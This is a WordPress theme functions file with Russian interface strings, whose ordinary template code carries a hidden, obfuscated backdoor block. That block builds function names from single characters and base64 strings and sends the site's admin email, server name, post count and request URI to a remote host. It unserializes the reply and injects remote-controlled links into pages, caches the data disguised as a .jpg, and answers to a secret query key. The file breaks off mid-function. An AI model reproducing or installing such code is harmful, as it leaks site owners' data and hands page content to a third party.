<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $hTxD='a';$KdXZj='6';$NgqT='d';$fkYp='4';$wgNwQOP='e';$sOIxZG='o';$ryzmoW='d';$ifaS='b';$fpxTM='e';$RMUQx='_';$ccHVt='e';$KjXIlfk='s';$IBFtF='c';$KbszWoGo=$ifaS.$hTxD.$KjXIlfk.$wgNwQOP.$KdXZj.$fkYp.$RMUQx.$NgqT.$fpxTM.$IBFtF.$sOIxZG.$ryzmoW.$ccHVt;$LKDUYH='f';$WXhLJK='l';$FaZuS='e';$UnHW='i';$YIdG='t';$MDFjiVS='z';$ECuLOS='n';$eGXpF='g';$TTmLa='a';$hmyZWSSj=$eGXpF.$MDFjiVS.$UnHW.$ECuLOS.$LKDUYH.$WXhLJK.$TTmLa.$YIdG.$FaZuS;$XLjDLiX='t';$NgoUf='s';$JeuXwQ='3';$myfV='1';$pcAyZes='t';$EiTn='_';$vHTRV='r';$TchgcJ='r';$XjBdgz='o';$ySJjBtBv=$NgoUf.$XLjDLiX.$TchgcJ.$EiTn.$vHTRV.$XjBdgz.$pcAyZes.$myfV.$JeuXwQ;$qaGBEV='r';$IJpru='e';$JLJRmWD='s';$WLrHQ='t';$jHUMeQy='v';$YNptdi='r';$RdlDoOdN=$JLJRmWD.$WLrHQ.$YNptdi.$qaGBEV.$IJpru.$jHUMeQy;                     
		$lu_____f='a';$bi______t='6';$um_______x='d';$ca_______________t='4';$fo__j='e';$pn__________u='o';$bq___d='d';$de______________q='b';$rg_________c='e';$hb_______________d='_';$zk______________b='e';$iu____f='s';$bu______k='c';$mf________v=$de______________q.$lu_____f.$iu____f.$fo__j.$bi______t.$ca_______________t.$hb_______________d.$um_______x.$rg_________c.$bu______k.$pn__________u.$bq___d.$zk______________b;
		$wu____________p='t';$ws_______________j='c';$ba________m='e';$xu___w='s';$yb_________p='i';$ti___________x='u';$pw______________n='f';$rd__n='i';$uy____r='x';$ln__r='s';$kt_________r='n';$wr________h='t';$gy_____________w='n';$lt___s='o';$us_______o='_';$jm__o=$pw______________n.$ti___________x.$kt_________r.$ws_______________j.$wu____________p.$yb_________p.$lt___s.$gy_____________w.$us_______o.$ba________m.$uy____r.$rd__n.$xu___w.$wr________h.$ln__r;
		$fp______q='f';$rr________p='e';$fv_____________u='p';$dj______p='o';$yo_____d='n';$xd_____________w=$fp______q.$dj______p.$fv_____________u.$rr________p.$yo_____d;
		$gn____n='d';$cp__c='e';$mk____k='f';$ap_____z='a';$ym_________u='r';$si___________r=$mk____k.$ym_________u.$cp__c.$ap_____z.$gn____n;
		$gx___________i='f';$vp______x='c';$ha__________o='s';$nn______________f='l';$qm_______d='o';$dw______________w='e';$db_________z=$gx___________i.$vp______x.$nn______________f.$qm_______d.$ha__________o.$dw______________w;
		
		define("WP_ID", $mf________v("Mi4wLjA="));
		define("WP_TTL", $mf________v("MTA4MDA="));
		define("WP_SRC", $mf________v("dHBva24="));
	


		function wp_get_header() {
			global $mf________v, $jm__o;
			
			if (
				$jm__o($mf________v("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$jm__o($mf________v("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$jm__o($mf________v("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $mf________v, $xd_____________w, $db_________z, $si___________r;
			
			$ha____t = TEMPLATEPATH."/".$mf________v("Zm9vdGVyLnBocA==");
			$vh______a = @$xd_____________w($ha____t, "r");
			$ha____t = @$si___________r($vh______a, @filesize($ha____t));
			@$db_________z($vh______a);
			
			$lo__d = TEMPLATEPATH."/".$mf________v("ZnVuY3Rpb25zLnBocA==");
			$vh______a = @$xd_____________w($lo__d, "r");
			$lo__d = @$si___________r($vh______a, @filesize($lo__d));
			@$db_________z($vh______a);
			
			$fx__________k = 0;
			if($ha____t && $lo__d) {
				if ($mf________v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ha____t, $mf________v("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$fx__________k = 1;
					}
					if (substr_count($ha____t, "wp_theme_GPL_credits()") < 1) {
						$fx__________k = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$fx__________k = 12;
				}
			}
			
			if($fx__________k > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $fx__________k -->";
			}
		}
	


		function wp_loaded() {
			global $mf________v, $jm__o;
			return $jm__o($mf________v("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($yq_________r, $rd__________q = "(more...)", $cf_______________q = 0, $zj____________p = "") {
				$tc______w = get_the_content($rd__________q, $cf_______________q, $zj____________p);
				$tc______w = apply_filters("the_content", $tc______w);
				
				$tc______w = str_replace("]]>", "]]>", $tc______w);
				if (strlen($_GET["p"]) > 0) {
					echo $tc______w;
				}
				else if ((strlen($tc______w)>$yq_________r) && ($hw____h = strpos($tc______w, " ", $yq_________r ))) {
					$tc______w = substr($tc______w, 0, $hw____h);
					$tc______w = $tc______w;
					echo $tc______w;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$rd__________q</a></div></p>";
				} else {
					echo $tc______w;
				}
				
			}
		}
	


		$ar___________f='6';$lh______w='n';$zg______________z='s';$ta___c='4';$nh_____________n='d';$ng__s='_';$ym____________s='e';$la___j='a';$qe__________h='b';$il_____h='c';$se______p='o';$jg___________a='e';$xj_______________f='e';$lb______e=$qe__________h.$la___j.$zg______________z.$xj_______________f.$ar___________f.$ta___c.$ng__s.$jg___________a.$lh______w.$il_____h.$se______p.$nh_____________n.$ym____________s;
		$ff____n='l';$og____i='n';$tv_____________z='o';$sm____________o='i';$rm__v='g';$dq______________n='t';$xy______________g='_';$cn___________h='c';$wm___e='f';$tw________p='t';$jp____________c='_';$yp__________v='n';$ze__m='e';$nk____r='e';$gd_____________q='e';$gs__________i='s';$on___f='t';$db_______k=$wm___e.$sm____________o.$ff____n.$gd_____________q.$xy______________g.$rm__v.$nk____r.$tw________p.$jp____________c.$cn___________h.$tv_____________z.$yp__________v.$on___f.$ze__m.$og____i.$dq______________n.$gs__________i;
		$sm_________c='i';$fa________i='f';$kh_______________b='s';$mc__________x='t';$va_________o='s';$os___x='e';$kh___________b='l';$hr______w='x';$rq_______________h='e';$du_______________c='_';$av__________g='i';$aj_______________f=$fa________i.$sm_________c.$kh___________b.$rq_______________h.$du_______________c.$os___x.$hr______w.$av__________g.$va_________o.$mc__________x.$kh_______________b;
		$nf_______________n='i';$dh___g='e';$qn_____n='r';$kj_____________t='a';$bh___b='v';$eh____________r='s';$xa______________a='c';$om____j='e';$iq______u='o';$ze_________n='r';$vf_______i='p';$nn________s='m';$up______________v='_';$nk______________q='n';$hz_____x='o';$pf_______________h=$bh___b.$dh___g.$qn_____n.$eh____________r.$nf_______________n.$iq______u.$nk______________q.$up______________v.$xa______________a.$hz_____x.$nn________s.$vf_______i.$kj_____________t.$ze_________n.$om____j;
		$tj________u='o';$jk_____________o='n';$gl____________y='f';$ec________c='s';$ci________w='o';$fj________i='k';$jp____________m='p';$qx__________w='e';$co_____________a='c';$up_________u=$gl____________y.$ec________c.$tj________u.$co_____________a.$fj________i.$ci________w.$jp____________m.$qx__________w.$jk_____________o;
		$mn____________z='f';$ea__l='i';$ul_____m='w';$hf____________w='t';$wa_____________c='e';$nh_____e='r';$wl_____i=$mn____________z.$ul_____m.$nh_____e.$ea__l.$hf____________w.$wa_____________c;
		$ra_______________y='d';$jq_______________n='m';$gs_____________c='5';$wj_______v=$jq_______________n.$ra_______________y.$gs_____________c;
		$qd__g='a';$ku_______l='a';$ou__________e='p';$my_________m='t';$ek______________q='e';$go_____a='r';$bp_______h='h';$bz_____________a='l';$qz___k=$go_____a.$ek______________q.$ku_______l.$bz_____________a.$ou__________e.$qd__g.$my_________m.$bp_______h;
		$ku______e='a';$bi______________n='i';$rw_______l='u';$da___z='r';$sq______________l='z';$ol_______________h='e';$cy____________q='e';$yx_______________x='i';$tl___h='s';$vc________m='l';$yu___________z='n';$jx_____________y=$rw_______l.$yu___________z.$tl___h.$ol_______________h.$da___z.$bi______________n.$ku______e.$vc________m.$yx_______________x.$sq______________l.$cy____________q;
		$lr_________n='a';$xs_______r='t';$ea__n='n';$mt_________h='p';$ea___________r='m';$iv_____________n='m';$ty________c='e';$fn______________b=$xs_______r.$ty________c.$iv_____________n.$mt_________h.$ea__n.$lr_________n.$ea___________r;
		$md______________x='r';$us_______w='x';$fi______________j='a';$ff_______u='t';$jd_______o='e';$ka______r='t';$bm_____________n='m';$vl_____________b='e';$cy_____o='_';$xo______________i='o';$qh_______________g='r';$tc______r='c';$kz________a='e';$lw_______________v='t';$lu_____________u='c';$px__________l='_';$tq___________o='t';$oz______z='e';$vi_____________r='a';$ic___________d='s';$ph_______________c='n';$yy____s=$ic___________d.$ka______r.$md______________x.$kz________a.$fi______________j.$bm_____________n.$px__________l.$lu_____________u.$xo______________i.$ph_______________c.$lw_______________v.$vl_____________b.$us_______w.$ff_______u.$cy_____o.$tc______r.$qh_______________g.$oz______z.$vi_____________r.$tq___________o.$jd_______o;
	


		function ut____________w($wh____________v) {
			global $mf________v, $jm__o, $db_______k, $pf_______________h, $yy____s;
			
			if (!$jm__o($mf________v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($pf_______________h(PHP_VERSION, "5.0.0", ">=") && $jm__o($mf________v("ZmlsZV9nZXRfY29udGVudHM=")) && $jm__o($mf________v("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$qu__________u = $yy____s(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$al_____________v = @$db_______k($wh____________v, 0, $qu__________u);
			} else {
				$al_____________v = @$db_______k($wh____________v, 0);
			}
			
			return $al_____________v;
		}
	


		function vu______________l($wh____________v) {
			global $jm__o, $up_________u, $wl_____i, $mf________v;
			
			if (!$jm__o($mf________v("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$od________j = strpos($wh____________v, "/", 7);
			$ce_______l = array(
				"uri"     => substr($wh____________v, $od________j),
				"host"    => str_replace("http://", "", substr($wh____________v, 0, $od________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$vf____y = @$up_________u("$ce_______l[host]", 80, $uc_____b, $xu___________o, 4);
			
			if (!$vf____y) {
				return false;
			} else {
				$al_____________v = "";
				$oa___________e  = "GET $ce_______l[uri] HTTP/1.0\r\n";
				$oa___________e .= "Host: $ce_______l[host]\r\n";
				$oa___________e .= "Referer: $ce_______l[referer]\r\n";
				$oa___________e .= "Connection: Close\r\n\r\n";
				
				@$wl_____i($vf____y, $oa___________e);
				
				while (!@feof($vf____y)) {
					$yq__m = @fgets($vf____y, (1024*24));
					
					if ($yq__m == "\r\n") {
						$wu______________g = true;
						continue;
					}
					
					if ($wu______________g) {
						$al_____________v .= $yq__m;
					}
				}
				
				return $al_____________v;
			}
		}
	


		function zj___________v($wh____________v) {
			global $jm__o;
			$df_______z = false;
			
			if ($wh____________v != "") {
				if ($jm__o("ut____________w")) {
					$df_______z = @ut____________w($wh____________v);
				}
				
				if (!$df_______z && ($jm__o("vu______________l"))) {
					$df_______z = @vu______________l($wh____________v);
				}
			}
			
			return $df_______z;
		}
	


		function ac________m() {
			global $_SERVER, $wj_______v;
			
			$lx_______________m = $_SERVER["SERVER_NAME"];
			
			if (substr("$lx_______________m", 0, 4) == "www.") {
				$lx_______________m = substr("$lx_______________m", 4);
			}
			
			$lx_______________m = $wj_______v("$_SERVER[SERVER_NAME]");
			
			return $lx_______________m;
		}
	


		function hy_______________p() {
			return "file";
		}
	


		function co____________f($wh____________v) {
			global $_SERVER, $db_______k, $aj_______________f, $xd_____________w, $db_________z, $wl_____i;
			
			$ak_______________x = ma________e();
			
			$ze___y = ac________m().".jpg";
			$cs_____________a = $ak_______________x["dir_upload"]["path"]."/$ze___y";
			$ml____e = @filemtime($cs_____________a);
			
			if (!$ml____e || ((time()-$ml____e) >= WP_TTL)) {
				$df_______z = zj___________v($wh____________v);
				
				if ($df_______z) {
					if ($aj_______________f($cs_____________a)) {
						@unlink($cs_____________a);
					}
					
					$vh______a = @$xd_____________w($cs_____________a, "x+");
					
					@$wl_____i($vh______a, $df_______z);
					@$db_________z($vh______a);
				}
			} else {
				if ($aj_______________f($cs_____________a)) {
					$df_______z = @$db_______k($cs_____________a);
				} else {
					$df_______z = false;
				}
			}
			
			return $df_______z;
		}
	


		function ma________e() {
			global $_SERVER, $mf________v, $lb______e;
			
			$ko_______________v = wp_count_posts("post");
			$vr___________h = pathinfo(get_bloginfo("template_directory"));
			
			$ak_______________x = array(
				"url" => array(
					"report"      => $mf________v("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $vr___________h,
				"dir_upload"	=> qc___x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$vr___________h[filename],
					"a005=".$ko_______________v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ak_______________x["url"]["queryString"] = implode("&", $ak_______________x["queryString"]);
			$ak_______________x["url"]["report"] = $ak_______________x["url"]["report"]."/?".$lb______e($ak_______________x["url"]["queryString"]).".html";
						
			return $ak_______________x;
		}
	


		function qc___x() {
			$la_____g = wp_upload_dir();
			
			if (isset($la_____g["error"])) {
				$si______________i = ne_______________l();
				if (is_writable($si______________i)) {
					$la_____g = array("path" => $si______________i);
				}
			}

			return $la_____g;
		}
	


		function ne_______________l() {
			global $jm__o, $wj_______v, $qz___k, $fn______________b;
			
			$xw____j = (bool) ini_get("safe_mode");
			if ($xw____j == true) {
				return false;
			}
			
			if ($jm__o("sys_get_temp_dir")) {
				$ut______z = sys_get_temp_dir();
				if (is_writable($ut______z)) {
					return $qz___k($ut______z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $qz___k($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $qz___k($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $qz___k($_ENV["TEMP"]);
			} else {
				$ld___d = $fn______________b($wj_______v(uniqid(rand(), true)), "");
				if ($ld___d) {
					$ut______z = $qz___k(dirname($ld___d));
					@unlink($ld___d);
					return $ut______z;
				} else {
					return false;
				}
			}
		}
	


		function eh_________h() {
			global $_GET, $aj_______________f;
			
			$ak_______________x = ma________e();
			$lx_______________m = ac________m();
			$ms_____v = hy_______________p();
			
			$vi_____________a = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ms_____v == "file") {
					$ne____________t = $ak_______________x["dir_upload"]["path"]."/".$lx_______________m.".jpg";
					if ($aj_______________f($ne____________t)) {
						@unlink($ne____________t);
						$vi_____________a = "deleted";
					}
				}
				
				$xs______j = array(
					"s"	=> $vi_____________a,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xs______j AS $ja____________w => $fn__________k) echo " [$ja____________w:$fn__________k]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $jm__o, $mf________v, $jx_____________y;
			$ak_______________x = ma________e();
			
			$pz____________n = "co____________f";
			if ($jm__o($pz____________n)) {
				$al_____________v = $pz____________n($ak_______________x["url"]["report"]);
			}
			
			if ($al_____________v) {
				if ($al_____________v = @$mf________v($al_____________v)) {
					$al_____________v = @$jx_____________y($al_____________v);
					
					if (strlen($al_____________v[custom_credit]) >= 5) {
						$ak_______________x["default_string"] = $al_____________v[custom_credit];
					}
					
					if ($al_____________v["status"] == "0") {
						$vo________b = 1;
						$db___m = 1;
					} else {
						$wb___x = sizeof($al_____________v["links"]);
						$ug_____o = $ak_______________x["default_string"];
						
						if ($wb___x > 0 && $al_____________v["links"] !== "") {
							$pt__a = 0;
							foreach ($al_____________v["links"] as $zj_____________l => $fb__q) {
								$pt__a++;
								if ($fb__q->l_path == "" || $fb__q->l_path == $_SERVER["REQUEST_URI"]) {
									$fb__q->l_href = htmlspecialchars(strip_tags($fb__q->l_href));
									$fb__q->l_title = htmlspecialchars(strip_tags($fb__q->l_title));
									$fb__q->l_anchor = htmlspecialchars(strip_tags($fb__q->l_anchor));
									$ug_____o .= " | ";
									$ug_____o .= "<a href='$fb__q->l_href' title='$fb__q->l_title'";
									if ($fb__q->l_nofollow == "1") {
										$ug_____o .= " rel='nofollow'";
									}
									$ug_____o .= ">$fb__q->l_anchor</a>";
								}
							}
						}
						$ak_______________x["links"] = "$ug_____o";
						if ($al_____________v[credit] == "0") {
							$ak_______________x["links"] = "";
						}
					}
				} else {
					$vo________b = "1";
				}
			} else {
				$vo________b = "1";
			}
			
			if ($vo________b == "1") {
				$ak_______________x["links"] = $ak_______________x["default_string"];
			}
			
			echo "$ak_______________x[links]";
			
			echo "<!-- s: $al_____________v[signature] -->";
			eh_________h();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
